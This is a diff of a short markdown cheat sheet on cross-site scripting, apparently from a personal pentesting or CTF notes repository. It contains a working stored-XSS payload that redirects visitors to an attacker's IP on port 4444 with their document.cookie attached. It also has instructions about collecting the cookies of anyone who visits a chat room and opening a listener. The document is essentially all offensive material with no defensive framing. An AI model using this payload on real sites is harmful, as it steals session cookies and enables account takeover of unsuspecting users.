ice-wzl/Hacknetics/web/XSS.md

 ````
 <script>window.location='http://10.13.**.**:4444/?cookie='+document.cookie</script>
 ````
-- Page should reload and you should have the cookie of anyone that visits the chat room
+- Note: Send the payload and then open the listener